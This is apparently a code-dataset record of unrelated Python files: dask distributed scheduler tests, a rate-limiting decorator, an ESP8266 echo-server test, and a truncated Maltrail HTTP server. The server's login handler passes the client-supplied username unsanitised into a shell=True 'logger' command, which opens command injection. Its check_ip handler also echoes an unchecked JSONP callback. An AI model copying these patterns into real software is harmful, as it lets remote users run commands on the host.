obj = CountSerialization()
[future] = yield e._scatter([obj])
yield s.replicate(keys=[future.key], n=10)
max_count = max(w.data[future.key].n for w in workers)
assert max_count > 1
@gen_cluster(executor=True, ncores=[('127.0.0.1', 1)] * 10)
def test_executor_replicate(e, s, *workers):
x = e.submit(inc, 1)
y = e.submit(inc, 2)
yield e._replicate([x, y], n=5)
assert len(s.who_has[x.key]) == 5
assert len(s.who_has[y.key]) == 5
yield e._replicate([x, y], n=3)
assert len(s.who_has[x.key]) == 3
assert len(s.who_has[y.key]) == 3
yield e._replicate([x, y])
assert len(s.who_has[x.key]) == 10
assert len(s.who_has[y.key]) == 10
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="Need 127.0.0.2 to mean localhost")
@gen_cluster(executor=True, ncores=[('127.0.0.1', 1),
('127.0.0.2', 1),
('127.0.0.2', 1)], timeout=None)
def test_executor_replicate_host(e, s, a, b, c):
x = e.submit(inc, 1, workers='127.0.0.2')
yield _wait([x])
assert (s.who_has[x.key] == {b.address} or
s.who_has[x.key] == {c.address})
yield e._replicate([x], workers=['127.0.0.2'])
assert s.who_has[x.key] == {b.address, c.address}
yield e._replicate([x], workers=['127.0.0.1'])
assert s.who_has[x.key] == {a.address, b.address, c.address}
def test_executor_replicate_sync(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
x = e.submit(inc, 1)
y = e.submit(inc, 2)
e.replicate([x, y], n=2)
who_has = e.who_has()
assert len(who_has[x.key]) == len(who_has[y.key]) == 2
with pytest.raises(ValueError):
e.replicate([x], n=0)
@gen_cluster(executor=True, ncores=[('127.0.0.1', 4)] * 1)
def test_task_load_adapts_quickly(e, s, a):
future = e.submit(slowinc, 1, delay=0.2) # slow
yield _wait(future)
assert 0.15 < s.task_duration['slowinc'] < 0.4
futures = e.map(slowinc, range(10), delay=0) # very fast
yield _wait(futures)
assert 0 < s.task_duration['slowinc'] < 0.1
@gen_cluster(executor=True, ncores=[('127.0.0.1', 1)] * 2)
def test_even_load_after_fast_functions(e, s, a, b):
x = e.submit(inc, 1, workers=a.address) # very fast
y = e.submit(inc, 2, workers=b.address) # very fast
yield _wait([x, y])
futures = e.map(inc, range(2, 11))
yield _wait(futures)
assert abs(len(a.data) - len(b.data)) <= 2
@gen_cluster(executor=True, ncores=[('127.0.0.1', 1)] * 2)
def test_even_load_on_startup(e, s, a, b):
x, y = e.map(inc, [1, 2])
yield _wait([x, y])
assert len(a.data) == len(b.data) == 1
@gen_cluster(executor=True, ncores=[('127.0.0.1', 2)] * 2)
def test_contiguous_load(e, s, a, b):
w, x, y, z = e.map(inc, [1, 2, 3, 4])
yield _wait([w, x, y, z])
groups = [set(a.data), set(b.data)]
assert {w.key, x.key} in groups
assert {y.key, z.key} in groups
@gen_cluster(executor=True, ncores=[('127.0.0.1', 1)] * 4)
def test_balanced_with_submit(e, s, *workers):
L = [e.submit(slowinc, i) for i in range(4)]
yield _wait(L)
for w in workers:
assert len(w.data) == 1
@gen_cluster(executor=True, ncores=[('127.0.0.1', 1)] * 4)
def test_balanced_with_submit_and_resident_data(e, s, *workers):
[x] = yield e._scatter([10], broadcast=True)
L = [e.submit(slowinc, x, pure=False) for i in range(4)]
yield _wait(L)
for w in workers:
assert len(w.data) == 2
@gen_cluster(executor=True, ncores=[('127.0.0.1', 1)] * 2)
def test_balanced_with_submit_and_resident_data_2(e, s, a, b):
slow1 = e.submit(slowinc, 1, delay=0.2, workers=a.address) # learn slow
slow2 = e.submit(slowinc, 2, delay=0.2, workers=b.address)
yield _wait([slow1, slow2])
aa = e.map(inc, range(100), pure=False, workers=a.address) # learn fast
bb = e.map(inc, range(100), pure=False, workers=b.address)
yield _wait(aa + bb)
cc = e.map(slowinc, range(10), delay=0.1)
while not all(c.done() for c in cc):
assert all(len(p) < 3 for p in s.processing.values())
yield gen.sleep(0.01)
@gen_cluster(executor=True, ncores=[('127.0.0.1', 20)] * 2)
def test_scheduler_saturates_cores(e, s, a, b):
for delay in [0, 0.01, 0.1]:
futures = e.map(slowinc, range(100), delay=delay)
futures = e.map(slowinc, futures, delay=delay / 10)
while not s.tasks or s.ready:
if s.tasks:
assert all(len(p) >= 20 for p in s.processing.values())
yield gen.sleep(0.01)
@gen_cluster(executor=True, ncores=[('127.0.0.1', 20)] * 2)
def test_scheduler_saturates_cores_stacks(e, s, a, b):
for delay in [0, 0.01, 0.1]:
x = e.map(slowinc, range(100), delay=delay, pure=False,
workers=a.address)
y = e.map(slowinc, range(100), delay=delay, pure=False,
workers=b.address)
while not s.tasks or any(s.stacks.values()):
if s.tasks:
for w, stack in s.stacks.items():
if stack:
assert len(s.processing[w]) >= s.ncores[w]
yield gen.sleep(0.01)
@gen_cluster(executor=True, ncores=[('127.0.0.1', 20)] * 2)
def test_scheduler_saturates_cores_random(e, s, a, b):
for delay in [0, 0.01, 0.1]:
futures = e.map(randominc, range(100), scale=0.1)
while not s.tasks or s.ready:
if s.tasks:
assert all(len(p) >= 20 for p in s.processing.values())
yield gen.sleep(0.01)
@gen_cluster(executor=True, ncores=[('127.0.0.1', 1)] * 2)
def test_dont_steal_expensive_data_fast_computation(e, s, a, b):
np = pytest.importorskip('numpy')
x = e.submit(np.arange, 1000000, workers=a.address)
yield _wait([x])
future = e.submit(np.sum, [1], workers=a.address) # learn that sum is fast
yield _wait([future])
cheap = [e.submit(np.sum, x, pure=False, workers=a.address,
allow_other_workers=True) for i in range(10)]
yield _wait(cheap)
assert len(b.data) == 0
assert len(a.data) == 12
@gen_cluster(executor=True, ncores=[('127.0.0.1', 1)] * 2)
def test_steal_cheap_data_slow_computation(e, s, a, b):
x = e.submit(slowinc, 100, delay=0.1) # learn that slowinc is slow
yield _wait([x])
futures = e.map(slowinc, range(10), delay=0.01, workers=a.address,
allow_other_workers=True)
yield _wait(futures)
assert abs(len(a.data) - len(b.data)) < 3
@gen_cluster(executor=True, ncores=[('127.0.0.1', 1)] * 2)
def test_steal_expensive_data_slow_computation(e, s, a, b):
np = pytest.importorskip('numpy')
x = e.submit(slowinc, 100, delay=0.1, workers=a.address)
yield _wait([x]) # learn that slowinc is slow
x = e.submit(np.arange, 1000000, workers=a.address) # put expensive data
yield _wait([x])
slow = [e.submit(slowinc, x, delay=0.1, pure=False) for i in range(4)]
yield _wait([slow])
assert b.data # not empty
@gen_cluster(executor=True, ncores=[('127.0.0.1', 1)] * 10)
def test_worksteal_many_thieves(e, s, *workers):
x = e.submit(slowinc, -1, delay=0.1)
yield x._result()
xs = e.map(slowinc, [x] * 100, pure=False, delay=0.01)
yield _wait(xs)
for w, keys in s.has_what.items():
assert 2 < len(keys) < 50
@gen_cluster(executor=True, ncores=[('127.0.0.1', 1)] * 2)
def test_dont_steal_unknown_functions(e, s, a, b):
futures = e.map(inc, [1, 2], workers=a.address, allow_other_workers=True)
yield _wait(futures)
assert len(a.data) == 2
assert len(b.data) == 0
@gen_cluster(executor=True, ncores=[('127.0.0.1', 1)] * 2)
def test_eventually_steal_unknown_functions(e, s, a, b):
futures = e.map(slowinc, range(10), delay=0.1, workers=a.address,
allow_other_workers=True)
yield _wait(futures)
assert len(a.data) >= 3
assert len(b.data) >= 3
@gen_cluster(executor=True, ncores=[('127.0.0.1', 1)] * 4, timeout=None)
def test_cancel_stress(e, s, *workers):
da = pytest.importorskip('dask.array')
x = da.random.random((40, 40), chunks=(1, 1))
x = e.persist(x)
yield _wait([x])
y = (x.sum(axis=0) + x.sum(axis=1) + 1).std()
for i in range(5):
f = e.compute(y)
while len(s.waiting) > (len(y.dask) - len(x.dask)) / 2:
yield gen.sleep(0.01)
yield e._cancel(f)
@gen_cluster(executor=True, ncores=[('127.0.0.1', 1)] * 4)
def test_cancel_clears_processing(e, s, *workers):
da = pytest.importorskip('dask.array')
x = e.submit(slowinc, 1, delay=0.2)
while not s.tasks:
yield gen.sleep(0.01)
yield e._cancel(x)
start = time()
while any(v for v in s.processing.values()):
assert time() < start + 0.2
yield gen.sleep(0.01)
s.validate()
def test_cancel_stress_sync(loop):
da = pytest.importorskip('dask.array')
x = da.random.random((40, 40), chunks=(1, 1))
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
x = e.persist(x)
y = (x.sum(axis=0) + x.sum(axis=1) + 1).std()
wait(x)
for i in range(5):
f = e.compute(y)
sleep(1)
e.cancel(f)
def test_default_get(loop):
with cluster() as (s, [a, b]):
pre_get = _globals.get('get')
pre_shuffle = _globals.get('shuffle')
with Executor(('127.0.0.1', s['port']), loop=loop, set_as_default=True) as e:
assert _globals['get'] == e.get
assert _globals['shuffle'] == 'tasks'
assert _globals['get'] is pre_get
assert _globals['shuffle'] == pre_shuffle
e = Executor(('127.0.0.1', s['port']), loop=loop, set_as_default=False)
assert _globals['get'] is pre_get
assert _globals['shuffle'] == pre_shuffle
e.shutdown()
e = Executor(('127.0.0.1', s['port']), loop=loop, set_as_default=True)
assert _globals['shuffle'] == 'tasks'
assert _globals['get'] == e.get
e.shutdown()
assert _globals['get'] is pre_get
assert _globals['shuffle'] == pre_shuffle
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
assert _globals['get'] == e.get
@gen_cluster(executor=True)
def test_get_stacks_processing(e, s, a, b):
stacks = yield e.scheduler.stacks()
assert stacks == valmap(list, s.stacks)
processing = yield e.scheduler.processing()
assert processing == valmap(list, s.processing)
futures = e.map(slowinc, range(10), delay=0.1, workers=[a.address],
allow_other_workers=True)
yield gen.sleep(0.2)
stacks = yield e.scheduler.stacks()
assert stacks == valmap(list, s.stacks)
processing = yield e.scheduler.processing()
assert processing == valmap(list, s.processing)
@gen_cluster(executor=True, Worker=Nanny)
def test_bad_tasks_fail(e, s, a, b):
f = e.submit(sys.exit, 1)
with pytest.raises(KilledWorker):
yield f._result()
def test_get_stacks_processing_sync(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
stacks = e.stacks()
processing = e.processing()
assert len(stacks) == len(processing) == 2
assert not any(v for v in stacks.values())
assert not any(v for v in processing.values())
futures = e.map(slowinc, range(10), delay=0.1,
workers=[('127.0.0.1', a['port'])],
allow_other_workers=True)
sleep(0.2)
aa = '127.0.0.1:%d' % a['port']
bb = '127.0.0.1:%d' % b['port']
stacks = e.stacks()
processing = e.processing()
assert stacks[aa]
assert all(k.startswith('slowinc') for k in stacks[aa])
assert stacks[bb] == []
assert set(e.stacks(aa)) == {aa}
assert set(e.stacks([aa])) == {aa}
assert set(e.processing(aa)) == {aa}
assert set(e.processing([aa])) == {aa}
e.cancel(futures)
def dont_test_scheduler_falldown(loop):
with cluster(worker_kwargs={'heartbeat_interval': 10}) as (s, [a, b]):
s['proc'].terminate()
s['proc'].join(timeout=2)
try:
s2 = Scheduler(loop=loop)
loop.add_callback(s2.start, s['port'])
sleep(0.1)
with Executor(('127.0.0.1', s['port']), loop=loop) as ee:
assert len(ee.ncores()) == 2
finally:
s2.close()
def test_shutdown_idempotent(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
e.shutdown()
e.shutdown()
e.shutdown()
@gen_cluster(executor=True)
def test_get_returns_early(e, s, a, b):
start = time()
with ignoring(Exception):
result = yield e._get({'x': (throws, 1), 'y': (sleep, 1)}, ['x', 'y'])
assert time() < start + 0.5
assert not e.futures
start = time()
while 'y' in s.tasks:
yield gen.sleep(0.01)
assert time() < start + 3
x = e.submit(inc, 1)
yield x._result()
with ignoring(Exception):
result = yield e._get({'x': (throws, 1),
x.key: (inc, 1)}, ['x', x.key])
assert x.key in s.tasks
@gen_cluster(Worker=Nanny, executor=True)
def test_Executor_clears_references_after_restart(e, s, a, b):
x = e.submit(inc, 1)
assert x.key in e.refcount
yield e._restart()
assert x.key not in e.refcount
key = x.key
del x
import gc; gc.collect()
assert key not in e.refcount
@gen_cluster(Worker=Nanny, executor=True)
def test_forgotten_futures_dont_clean_up_new_futures(e, s, a, b):
x = e.submit(inc, 1)
yield e._restart()
y = e.submit(inc, 1)
del x
import gc; gc.collect()
yield gen.sleep(0.1)
yield y._result()
def test_get_stops_work_after_error(loop):
loop2 = IOLoop()
s = Scheduler(loop=loop2)
s.start(0)
w = Worker(s.ip, s.port, loop=loop2)
w.start(0)
t = Thread(target=loop2.start)
t.daemon = True
t.start()
with Executor(s.address, loop=loop) as e:
with pytest.raises(Exception):
e.get({'x': (throws, 1), 'y': (sleep, 1)}, ['x', 'y'])
start = time()
while len(s.tasks):
sleep(0.1)
assert time() < start + 5
loop2.add_callback(loop2.stop)
while loop2._running:
sleep(0.01)
loop2.close(all_fds=True)
t.join()
def test_as_completed_list(loop):
with cluster() as (s, [a, b]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
seq = e.map(inc, iter(range(5)))
seq2 = list(as_completed(seq))
assert set(e.gather(seq2)) == {1, 2, 3, 4, 5}
@pytest.mark.ipython
def test_start_ipython(loop):
from jupyter_client import BlockingKernelClient
from ipykernel.kernelapp import IPKernelApp
from IPython.core.interactiveshell import InteractiveShell
with cluster(1) as (s, [a]):
with Executor(('127.0.0.1', s['port']), loop=loop) as e:
info_dict = e.start_ipython()
info = first(info_dict.values())
key = info.pop('key')
kc = BlockingKernelClient(**info)
kc.session.key = key
kc.start_channels()
msg_id = kc.execute("worker")
reply = kc.get_shell_msg(timeout=10)
kc.stop_channels()
@pytest.mark.ipython
def test_start_ipython_magic(loop):
ip = mock.Mock()
with cluster() as (s, [a, b]):
with mock.patch('IPython.get_ipython', lambda : ip), Executor(('127.0.0.1', s['port']), loop=loop) as e:
workers = list(e.ncores())[:2]
names = [ 'magic%i' % i for i in range(len(workers)) ]
e.start_ipython(workers, magic_names=names)
assert ip.register_magic_function.call_count == 4
expected = [
{'magic_kind': 'line', 'magic_name': 'magic0'},
{'magic_kind': 'cell', 'magic_name': 'magic0'},
{'magic_kind': 'line', 'magic_name': 'magic1'},
{'magic_kind': 'cell', 'magic_name': 'magic1'},
]
call_kwargs_list = [ kwargs for (args, kwargs) in ip.register_magic_function.call_args_list ]
assert call_kwargs_list == expected
@pytest.mark.ipython
def test_start_ipython_qtconsole(loop):
Popen = mock.Mock()
with cluster() as (s, [a, b]):
with mock.patch('distributed._ipython_utils.Popen', Popen), Executor(('127.0.0.1', s['port']), loop=loop) as e:
worker = first(e.ncores())
e.start_ipython(worker, qtconsole=True)
e.start_ipython(worker, qtconsole=True, qtconsole_args=['--debug'])
assert Popen.call_count == 2
(cmd,), kwargs = Popen.call_args_list[0]
assert cmd[:3] == [ 'jupyter', 'qtconsole', '--existing' ]
(cmd,), kwargs = Popen.call_args_list[1]
assert cmd[-1:] == [ '--debug' ]
@gen_cluster(ncores=[], executor=True, timeout=None)
def test_stress_creation_and_deletion(e, s):
da = pytest.importorskip('dask.array')
x = da.random.random(size=(2000, 2000), chunks=(100, 100))
y = (x + 1).T + (x * 2) - x.mean(axis=1)
z = e.persist(y)
@gen.coroutine
def create_and_destroy_worker(delay):
start = time()
while time() < start + 10:
n = Nanny(s.ip, s.port, ncores=2, loop=s.loop)
n.start(0)
yield gen.sleep(delay)
yield n._close()
print("Killed nanny")
yield [create_and_destroy_worker(0.1 * i) for i in range(10)]
|
decorators.py
|
import threading
from functools import wraps
from typing import Optional
from request_limiter.exceptions import LimitException
from request_limiter.strategy import LimitStrategy, LimitedIntervalStrategy
class RequestLimiterDecorator(object):
"""
A decorator class used to limit request rate to a function using a custom strategy or the default
LimitedIntervalStrategy.
"""
def __init__(self, strategy: Optional[LimitStrategy] = None):
"""
:param strategy: A request limit strategy
"""
self.strategy = strategy or LimitedIntervalStrategy()
def __call__(self, f):
"""
Returns a wrapped function that checks the strategy before invoking the function
:param f: The function to be wrapped
:return: Wrapped function
"""
# Run clean up daemon in background
clean_task = threading.Thread(target=self.strategy.clean, daemon=True)
        clean_task.start()
        # Create the lock once so every call to the wrapped function shares it;
        # constructing a fresh RLock inside the wrapper would never block anyone.
        lock = threading.RLock()
        @wraps(f)
        def wrapper(*args, **kwargs):
            """
            Checks the strategy and raises LimitException if the function has
            reached the maximum allowed number of invocations
            """
            with lock:  # request in a thread-safe way
                key = kwargs.pop('limit_key', None)
                if not self.strategy.allow(key=key):  # failed to allocate
                    raise LimitException('Rate limit exceeded.', self.strategy)
                return f(*args, **kwargs)
return wrapper
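# Illustrative usage sketch (an assumption, not part of the original module):
# applying the decorator with its default LimitedIntervalStrategy. `fetch_profile`
# and the 'client-1' key are hypothetical names used only for this example.
#
#   @RequestLimiterDecorator()
#   def fetch_profile(user_id, limit_key=None):
#       return {'id': user_id}
#
#   try:
#       fetch_profile(42, limit_key='client-1')
#   except LimitException:
#       pass  # this caller exceeded the allowed rate for 'client-1'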
def django_request_limiter(f):
"""
    Wraps a Django request handler so the limit strategy is keyed on the client IP.
    When the limit is exceeded, the wrapper returns an HTTP 429 response instead of raising.
:param f: django request handler function decorated with request_limiter
:return: wrapped function
"""
@wraps(f)
def wrapper(request, *args, **kwargs):
# Set the default limit per IP
ip = request.META.get('REMOTE_ADDR')
kwargs['limit_key'] = ip
try:
return f(request, *args, **kwargs)
except LimitException as e:
from django.http import HttpResponse
body = "Rate limit exceeded. Try again in {} seconds".format(e.strategy.get_remaining(ip))
return HttpResponse(body, status=429)
return wrapper
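# Minimal sketch of how the two pieces compose in a Django project (assumption:
# the view and strategy below are illustrative only, not taken from this repository):
#
#   @django_request_limiter
#   @RequestLimiterDecorator(strategy=LimitedIntervalStrategy())
#   def my_view(request):
#       from django.http import HttpResponse
#       return HttpResponse('ok')
#
# django_request_limiter injects the client IP as `limit_key`, the inner decorator
# enforces the strategy per IP, and any LimitException becomes an HTTP 429 response.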
|
test_sw_WiFiServer.py
|
from mock_decorators import setup, teardown
from threading import Thread
import socket
import time
stop_client_thread = False
client_thread = None
@setup('Simple echo server')
def setup_echo_server(e):
global stop_client_thread
global client_thread
def echo_client_thread():
        time.sleep(1)  # allow some time for mDNS to start
server_address = socket.gethostbyname('esp8266-wfs-test.local')
count = 0
while count < 5 and not stop_client_thread:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((server_address, 5000))
sock.settimeout(1.0)
buf = 'a' * 1023 + '\n'
sock.sendall(bytes(buf.encode('utf-8')))
data = ''
retries = 0
            while len(data) < 1024 and retries < 3:
                data += sock.recv(1024).decode('utf-8')
                retries += 1
            sock.close()  # release the socket before the next iteration
            print('Received {} bytes'.format(len(data)))
            if len(data) != 1024:
                raise RuntimeError('client failed to receive response')
            count += 1
stop_client_thread = False
client_thread = Thread(target=echo_client_thread)
client_thread.start()
@teardown('Simple echo server')
def teardown_echo_server(e):
global stop_client_thread
stop_client_thread = True
client_thread.join()
|
httpd.py
|
#!/usr/bin/env python
"""
Copyright (c) 2014-2019 Miroslav Stampar (@stamparm)
See the file 'LICENSE' for copying permission
"""
import BaseHTTPServer
import cStringIO
import datetime
import httplib
import glob
import gzip
import hashlib
import io
import json
import mimetypes
import os
import re
import socket
import SocketServer
import subprocess
import threading
import time
import traceback
import urllib
import urlparse
from core.addr import addr_to_int
from core.addr import int_to_addr
from core.addr import make_mask
from core.attribdict import AttribDict
from core.common import get_regex
from core.common import ipcat_lookup
from core.common import worst_asns
from core.enums import HTTP_HEADER
from core.settings import config
from core.settings import CONTENT_EXTENSIONS_EXCLUSIONS
from core.settings import DATE_FORMAT
from core.settings import DISABLED_CONTENT_EXTENSIONS
from core.settings import DISPOSED_NONCES
from core.settings import HTML_DIR
from core.settings import HTTP_TIME_FORMAT
from core.settings import MAX_NOFILE
from core.settings import NAME
from core.settings import PING_RESPONSE
from core.settings import SERVER_HEADER
from core.settings import SESSION_COOKIE_NAME
from core.settings import SESSION_EXPIRATION_HOURS
from core.settings import SESSION_ID_LENGTH
from core.settings import SESSIONS
from core.settings import TRAILS_FILE
from core.settings import UNAUTHORIZED_SLEEP_TIME
from core.settings import VERSION
try:
# Reference: https://bugs.python.org/issue7980
# Reference: http://code-trick.com/python-bug-attribute-error-_strptime/
import _strptime
except ImportError:
pass
try:
import resource
resource.setrlimit(resource.RLIMIT_NOFILE, (MAX_NOFILE, MAX_NOFILE))
except:
pass
def start_httpd(address=None, port=None, join=False, pem=None):
"""
Starts HTTP server
"""
class ThreadingServer(SocketServer.ThreadingMixIn, BaseHTTPServer.HTTPServer):
def server_bind(self):
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
BaseHTTPServer.HTTPServer.server_bind(self)
def finish_request(self, *args, **kwargs):
try:
BaseHTTPServer.HTTPServer.finish_request(self, *args, **kwargs)
except:
if config.SHOW_DEBUG:
traceback.print_exc()
class SSLThreadingServer(ThreadingServer):
def __init__(self, server_address, pem, HandlerClass):
import OpenSSL # python-openssl
ThreadingServer.__init__(self, server_address, HandlerClass)
ctx = OpenSSL.SSL.Context(OpenSSL.SSL.TLSv1_METHOD)
ctx.use_privatekey_file(pem)
ctx.use_certificate_file(pem)
self.socket = OpenSSL.SSL.Connection(ctx, socket.socket(self.address_family, self.socket_type))
self.server_bind()
self.server_activate()
def shutdown_request(self, request):
try:
request.shutdown()
except:
if config.SHOW_DEBUG:
traceback.print_exc()
class ReqHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_GET(self):
path, query = self.path.split('?', 1) if '?' in self.path else (self.path, "")
params = {}
content = None
skip = False
if hasattr(self, "data"):
params.update(urlparse.parse_qs(self.data))
if query:
params.update(urlparse.parse_qs(query))
for key in params:
if params[key]:
params[key] = params[key][-1]
if path == '/':
path = "index.html"
path = path.strip('/')
extension = os.path.splitext(path)[-1].lower()
if hasattr(self, "_%s" % path):
content = getattr(self, "_%s" % path)(params)
else:
path = path.replace('/', os.path.sep)
path = os.path.abspath(os.path.join(HTML_DIR, path)).strip()
if not os.path.isfile(path) and os.path.isfile("%s.html" % path):
path = "%s.html" % path
if any((config.IP_ALIASES,)) and self.path.split('?')[0] == "/js/main.js":
content = open(path, "rb").read()
content = re.sub(r"\bvar IP_ALIASES =.+", "var IP_ALIASES = {%s};" % ", ".join('"%s": "%s"' % (_.split(':', 1)[0].strip(), _.split(':', 1)[-1].strip()) for _ in config.IP_ALIASES), content)
self.send_response(httplib.OK)
elif ".." not in os.path.relpath(path, HTML_DIR) and os.path.isfile(path) and (extension not in DISABLED_CONTENT_EXTENSIONS or os.path.split(path)[-1] in CONTENT_EXTENSIONS_EXCLUSIONS):
mtime = time.gmtime(os.path.getmtime(path))
if_modified_since = self.headers.get(HTTP_HEADER.IF_MODIFIED_SINCE)
if if_modified_since and extension not in (".htm", ".html"):
if_modified_since = [_ for _ in if_modified_since.split(';') if _.upper().endswith("GMT")][0]
if time.mktime(mtime) <= time.mktime(time.strptime(if_modified_since, HTTP_TIME_FORMAT)):
self.send_response(httplib.NOT_MODIFIED)
self.send_header(HTTP_HEADER.CONNECTION, "close")
skip = True
if not skip:
content = open(path, "rb").read()
last_modified = time.strftime(HTTP_TIME_FORMAT, mtime)
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, mimetypes.guess_type(path)[0] or "application/octet-stream")
self.send_header(HTTP_HEADER.LAST_MODIFIED, last_modified)
if extension not in (".htm", ".html"):
self.send_header(HTTP_HEADER.EXPIRES, "Sun, 17-Jan-2038 19:14:07 GMT") # Reference: http://blog.httpwatch.com/2007/12/10/two-simple-rules-for-http-caching/
self.send_header(HTTP_HEADER.CACHE_CONTROL, "max-age=3600, must-revalidate") # Reference: http://stackoverflow.com/a/5084555
else:
self.send_header(HTTP_HEADER.CACHE_CONTROL, "no-cache")
else:
self.send_response(httplib.NOT_FOUND)
self.send_header(HTTP_HEADER.CONNECTION, "close")
content = '<!DOCTYPE html><html lang="en"><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL %s was not found on this server.</p></body></html>' % self.path.split('?')[0]
if content is not None:
for match in re.finditer(r"<\!(\w+)\!>", content):
name = match.group(1)
_ = getattr(self, "_%s" % name.lower(), None)
if _:
content = self._format(content, **{ name: _() })
if "gzip" in self.headers.getheader(HTTP_HEADER.ACCEPT_ENCODING, ""):
self.send_header(HTTP_HEADER.CONTENT_ENCODING, "gzip")
_ = cStringIO.StringIO()
compress = gzip.GzipFile("", "w+b", 9, _)
compress._stream = _
compress.write(content)
compress.flush()
compress.close()
content = compress._stream.getvalue()
self.send_header(HTTP_HEADER.CONTENT_LENGTH, str(len(content)))
self.end_headers()
if content:
self.wfile.write(content)
self.wfile.flush()
self.wfile.close()
def do_POST(self):
length = self.headers.getheader(HTTP_HEADER.CONTENT_LENGTH)
data = self.rfile.read(int(length))
data = urllib.unquote_plus(data)
self.data = data
self.do_GET()
def get_session(self):
retval = None
cookie = self.headers.get(HTTP_HEADER.COOKIE)
if cookie:
match = re.search(r"%s\s*=\s*([^;]+)" % SESSION_COOKIE_NAME, cookie)
if match:
session = match.group(1)
if session in SESSIONS:
if SESSIONS[session].client_ip != self.client_address[0]:
pass
elif SESSIONS[session].expiration > time.time():
retval = SESSIONS[session]
else:
del SESSIONS[session]
return retval
def delete_session(self):
cookie = self.headers.get(HTTP_HEADER.COOKIE)
if cookie:
match = re.search(r"%s=(.+)" % SESSION_COOKIE_NAME, cookie)
if match:
session = match.group(1)
if session in SESSIONS:
del SESSIONS[session]
def version_string(self):
return SERVER_HEADER
def end_headers(self):
if not hasattr(self, "_headers_ended"):
BaseHTTPServer.BaseHTTPRequestHandler.end_headers(self)
self._headers_ended = True
def log_message(self, format, *args):
return
def finish(self):
try:
BaseHTTPServer.BaseHTTPRequestHandler.finish(self)
except:
if config.SHOW_DEBUG:
traceback.print_exc()
def _version(self):
return VERSION
def _format(self, content, **params):
if content:
for key, value in params.items():
content = content.replace("<!%s!>" % key, value)
return content
def _login(self, params):
valid = False
if params.get("username") and params.get("hash") and params.get("nonce"):
if params.get("nonce") not in DISPOSED_NONCES:
DISPOSED_NONCES.add(params.get("nonce"))
for entry in (config.USERS or []):
entry = re.sub(r"\s", "", entry)
username, stored_hash, uid, netfilter = entry.split(':')
if username == params.get("username"):
try:
if params.get("hash") == hashlib.sha256(stored_hash.strip() + params.get("nonce")).hexdigest():
valid = True
break
except:
if config.SHOW_DEBUG:
traceback.print_exc()
if valid:
session_id = os.urandom(SESSION_ID_LENGTH).encode("hex")
expiration = time.time() + 3600 * SESSION_EXPIRATION_HOURS
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.SET_COOKIE, "%s=%s; expires=%s; path=/; HttpOnly" % (SESSION_COOKIE_NAME, session_id, time.strftime(HTTP_TIME_FORMAT, time.gmtime(expiration))))
if netfilter in ("", "0.0.0.0/0"):
netfilters = None
else:
addresses = set()
netmasks = set()
for item in set(re.split(r"[;,]", netfilter)):
item = item.strip()
if '/' in item:
_ = item.split('/')[-1]
if _.isdigit() and int(_) >= 16:
lower = addr_to_int(item.split('/')[0])
mask = make_mask(int(_))
upper = lower | (0xffffffff ^ mask)
while lower <= upper:
addresses.add(int_to_addr(lower))
lower += 1
else:
netmasks.add(item)
elif '-' in item:
_ = item.split('-')
lower, upper = addr_to_int(_[0]), addr_to_int(_[1])
while lower <= upper:
addresses.add(int_to_addr(lower))
lower += 1
elif re.search(r"\d+\.\d+\.\d+\.\d+", item):
addresses.add(item)
netfilters = netmasks
if addresses:
netfilters.add(get_regex(addresses))
SESSIONS[session_id] = AttribDict({"username": username, "uid": uid, "netfilters": netfilters, "expiration": expiration, "client_ip": self.client_address[0]})
else:
time.sleep(UNAUTHORIZED_SLEEP_TIME)
self.send_response(httplib.UNAUTHORIZED)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
content = "Login %s" % ("success" if valid else "failed")
if not subprocess.mswindows:
try:
subprocess.check_output("logger -p auth.info -t \"%s[%d]\" \"%s password for %s from %s port %s\"" % (NAME.lower(), os.getpid(), "Accepted" if valid else "Failed", params.get("username"), self.client_address[0], self.client_address[1]), stderr=subprocess.STDOUT, shell=True)
except Exception:
if config.SHOW_DEBUG:
traceback.print_exc()
return content
def _logout(self, params):
self.delete_session()
self.send_response(httplib.FOUND)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.LOCATION, "/")
def _whoami(self, params):
session = self.get_session()
username = session.username if session else ""
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
return username
def _check_ip(self, params):
session = self.get_session()
if session is None:
self.send_response(httplib.UNAUTHORIZED)
self.send_header(HTTP_HEADER.CONNECTION, "close")
return None
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
try:
result_worst = worst_asns(params.get("address"))
if result_worst:
result_ipcat = result_worst
else:
_ = (ipcat_lookup(params.get("address")) or "").lower().split(' ')
result_ipcat = _[1] if _[0] == 'the' else _[0]
return ("%s" if not params.get("callback") else "%s(%%s)" % params.get("callback")) % json.dumps({"ipcat": result_ipcat, "worst_asns": str(result_worst is not None).lower()})
except:
if config.SHOW_DEBUG:
traceback.print_exc()
def _trails(self, params):
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
return open(TRAILS_FILE, "rb").read()
def _ping(self, params):
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
return PING_RESPONSE
def _events(self, params):
session = self.get_session()
if session is None:
